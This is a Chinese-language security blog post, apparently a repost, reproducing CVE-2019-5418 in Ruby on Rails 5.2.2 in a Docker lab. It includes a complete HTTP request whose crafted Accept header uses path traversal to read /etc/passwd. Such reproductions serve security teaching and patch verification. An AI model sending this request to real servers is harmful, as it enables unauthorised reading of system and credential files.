CVE-2019-5418 Ruby on Rails 任意读取漏洞

admin
admin
admin
139915
文章
114
评论
2021年4月24日03:20:42评论78 views字数 851阅读2分50秒阅读模式

CVE-2019-5418 Ruby on Rails 任意读取漏洞 

Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)


在控制器中通过`render file`形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。

我们通过传入


`Accept: ../../../../../../../../etc/passwd{{`头来构成构造路径穿越漏洞,读取任意文件。


参考链接:
- https://groups.google.com/forum/ ... ecurity/pFRKI96Sm8Q
- https://xz.aliyun.com/t/4448


环境搭建
执行如下命令编译及启动


Rail On Rails 5.2.2:docker-compose build/docker-compose up -d


CVE-2019-5418 Ruby on Rails 任意读取漏洞 


环境启动后,访问`http://your-ip:3000`即可看到Ruby on Rails的欢迎页面。


CVE-2019-5418 Ruby on Rails 任意读取漏洞 


漏洞复现
访问`http://your-ip:3000/robots`可见,正常的robots.txt文件被读取出来。


CVE-2019-5418 Ruby on Rails 任意读取漏洞 

利用漏洞,发送如下数据包,读取`/etc/passwd`:
```
GET /robots HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
成功读取:


CVE-2019-5418 Ruby on Rails 任意读取漏洞


CVE-2019-5418 Ruby on Rails 任意读取漏洞


推荐文章++++

CVE-2019-5418 Ruby on Rails 任意读取漏洞

*CVE-2019-11043 PHP远程代码执行

*Apache Unomi 远程表达式代码执行(CVE-2020-13942)漏洞复现

*Webmin 远程命令执行(CVE-2019-15107)漏洞利用


CVE-2019-5418 Ruby on Rails 任意读取漏洞

CVE-2019-5418 Ruby on Rails 任意读取漏洞

本文始发于微信公众号(黑白之道):CVE-2019-5418 Ruby on Rails 任意读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月24日03:20:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2019-5418 Ruby on Rails 任意读取漏洞https://cn-sec.com/archives/214725.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息